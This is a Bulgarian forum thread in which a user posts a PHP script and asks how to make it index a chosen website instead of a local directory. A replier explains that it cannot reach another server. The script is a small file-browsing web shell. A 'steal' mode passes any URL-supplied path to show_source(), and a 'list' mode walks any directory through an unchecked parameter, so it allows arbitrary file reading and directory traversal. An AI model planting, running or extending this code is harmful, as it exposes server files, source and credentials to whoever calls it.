помощ

vesku

Registered
помогнете ми да направете този скрипт да индексира зададен сайт а не директория

Код:
<?
$mode = $_GET['mode'];
$cat = $_GET['cat'];
$dir = $_GET['dir'];


if($mode=="")
{
echo"<center>";
echo"<a href=?mode=list>Intra da ai GRIJA, nu stii ce se poate intampla dincolo de usa cu bolta </a>";
echo"</center>";
}

elseif($mode=="steal")
{


if($cat=="")
{
$cat="xs.php";
}

$size=filesize($cat);
$file_size = round($size / 1024 * 100) / 100 . "Kb";

echo"<table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";
$po=show_source($cat);
echo "</td></tr></table></center>";
echo "</body></html>";
}
elseif($mode=="list")
{

echo"<title>Afisare de directoare</title>";
$base = substr($_SERVER['PATH_TRANSLATED'],0,strrpos($_SERVER['PATH_TRANSLATED'],'/'));

if($dir=="")
{
$dir="./";
}
$path = $dir;

function after ($this, $inthat)
   {
       if (!is_bool(strpos($inthat, $this)))
       return substr($inthat, strpos($inthat,$this)+strlen($this));
   }

echo "<center><B>$dir</B></font></center><table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";
$dir_handle = @opendir($path) or die("Nu se poate paci :(");
while (false !== ($file = readdir($dir_handle))) {
$link = "<a target=_blank href=?mode=steal&cat=$dir/$file><font color=#000080>$file</font></a><br>";
$formato = after('.', $file);

If($formato==".") {
$link = "<a href=?mode=list&dir=$dir/$file>Directorul precedent</a><br>";
}

If($formato=="") {
$link = "<a href=?mode=list&dir=$dir/$file><font color=#800000>$file</font></a><br>";
}

echo "$link";
}
closedir($dir_handle);
echo "</td></tr></table>";
}
?>
 
Трябва да разглеждам кода 30 мин. за да разбера какво прави.
ТОва което виждам на пръв поглед е че показва файловете в да дена директория и размера им.
Просто не виждам начин този скрипт да индексира директория
която е на друг сървър.
Няма как да промениш нещо и да почнеш да индексираш data.bg .
Нещата са много различни. :?
 

Горе